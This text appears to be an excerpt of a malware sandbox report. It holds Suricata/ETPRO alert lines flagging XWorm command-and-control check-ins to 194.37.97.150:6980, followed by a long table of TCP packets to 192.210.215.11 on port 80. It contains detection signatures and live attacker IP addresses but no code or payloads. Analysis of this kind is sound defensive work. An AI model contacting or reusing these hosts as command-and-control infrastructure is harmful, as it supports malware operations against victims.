                          2024-10-01T07:40:23.297476+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1194.37.97.1506980192.168.2.849705TCP
                          2024-10-01T07:40:23.535255+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1194.37.97.1506980192.168.2.849705TCP
                          2024-10-01T07:40:25.006132+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705194.37.97.1506980TCP
                          2024-10-01T07:40:25.226430+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1194.37.97.1506980192.168.2.849705TCP
                          2024-10-01T07:40:25.227115+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705194.37.97.1506980TCP

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Oct 1, 2024 07:38:13.423930883 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:13.428740978 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:13.428868055 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:13.429106951 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:13.433839083 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:13.919840097 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:13.919861078 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:13.919881105 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:13.919889927 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:13.919905901 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:13.919922113 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:13.919929981 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:13.919939041 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:13.919955015 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:13.919972897 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:13.920032978 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:13.920057058 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:13.924865961 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:13.924882889 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:13.924899101 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:13.925395012 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:13.925395966 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.008946896 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.008975029 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.009000063 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.009015083 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.009030104 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.009031057 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.009031057 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.009059906 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.009174109 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.009299040 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.009387016 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.009496927 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.009511948 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.009527922 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.009543896 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.009551048 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.009560108 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.009598970 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.009598970 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.009706974 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.010346889 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.010361910 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.010376930 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.010391951 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.010407925 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.010425091 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.010425091 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.010499001 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.011117935 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.011140108 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.011157036 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.011178017 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.011188984 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.011189938 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.011198044 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.011245966 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.011245966 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.011245966 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.011931896 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.012000084 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.012027025 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.012099028 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.013744116 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.013906002 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.097707987 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.097744942 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.097762108 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.097776890 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.097784996 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.097803116 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.097820044 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.097826958 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.097826958 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.097836971 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.097862005 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.097870111 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.097877979 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.097878933 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.097896099 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.097910881 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.097913027 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.097929001 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.097932100 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.097946882 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.097975016 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.097975969 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.098275900 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.098293066 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.098311901 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.098334074 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.098334074 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.098376036 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.098398924 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.098413944 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.098439932 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.098452091 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.098452091 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.098453999 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.098472118 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.098478079 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.098488092 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.098505020 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.098519087 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.098519087 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.098520994 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.098556042 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.098571062 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.099075079 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.099092007 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.099117041 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.099133015 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.099148989 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.099164009 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.099180937 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.099206924 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.099206924 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.099208117 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.099208117 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.099208117 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.099215031 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.099231958 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.099242926 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.099248886 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.099256039 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.099265099 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.099281073 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.099298000 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.099298000 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.099298000 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.099349022 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.099349022 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.099349022 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.100106001 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.100122929 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.100136995 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.100152016 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.100167036 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.100176096 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.100176096 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.100184917 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.100203037 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.100209951 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.100218058 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.100234032 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.100238085 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.100250006 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.100302935 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.100302935 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.100302935 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.186271906 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.186292887 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.186310053 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.186325073 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.186340094 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.186341047 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.186407089 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.186422110 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.186435938 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.186450958 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.186465979 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.186472893 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.186472893 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.186472893 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.186472893 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.186480999 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.186512947 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.186512947 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.186671972 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.186728954 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.186743975 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.186758041 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.186770916 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.186770916 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.186820030 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.186820030 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.186991930 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.187016010 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.187031031 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.187047005 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.187063932 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.187077999 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.187093973 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.187093973 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.187093973 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.187093973 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.187093973 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.187108040 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.187124968 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.187139988 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.187176943 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.187176943 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.187176943 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.187225103 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.187510014 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.187524080 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.187540054 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.187557936 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.187570095 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.187586069 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.187588930 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.187608957 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.187623978 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.187638044 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.187653065 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.187666893 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.187669039 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.187669039 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.187669039 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.187669039 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.187681913 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.187697887 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.187712908 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.187728882 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.187742949 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.187742949 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.187742949 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.187747002 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.187761068 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.187812090 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.188357115 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.188373089 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.188390017 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.188404083 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.188417912 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.188421965 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.188435078 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.188451052 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.188478947 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.188488960 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.188488960 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.188488960 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.188493013 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.188508987 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.188524008 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.188527107 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.188539028 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.188551903 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.188555956 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.188570023 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.188571930 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.188589096 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.188590050 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.188605070 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.188616037 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.188621998 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.188668013 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.188946962 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.189418077 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.189433098 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.189448118 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.189462900 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.189475060 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.189479113 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.189490080 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.189495087 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.189510107 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.189522028 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.189523935 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.189534903 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.189539909 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.189553976 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.189565897 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.189569950 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.189584017 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.189599037 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.189614058 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.189629078 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.189636946 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.189636946 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.189636946 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.189642906 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.189659119 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.189711094 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.189711094 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.189711094 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.190268040 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.190284014 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.190299034 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.190377951 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.190377951 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.190377951 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.275012016 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.275131941 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.275157928 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.275173903 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.275187969 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.275202990 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.275217056 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.275232077 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.275247097 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.275263071 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.275275946 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.275291920 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.275291920 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.275293112 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.275293112 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.275293112 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.275293112 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.275306940 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.275451899 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.275465965 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.275481939 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.275496006 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.275511980 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.275511980 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.275511980 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.275511980 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.275511980 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.275547981 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.275594950 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.275609016 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.275645018 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.275645018 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.275645018 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.275645018 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.275645018 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.275684118 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.275696993 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.275713921 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.275882959 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.275897026 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.275913000 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.275927067 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.275939941 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.275939941 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.275939941 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.275939941 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.275940895 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.275939941 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.275955915 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.275979042 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.275993109 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.276009083 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.276022911 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.276037931 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.276051044 CEST4970480192.168.2.8192.210.215.11
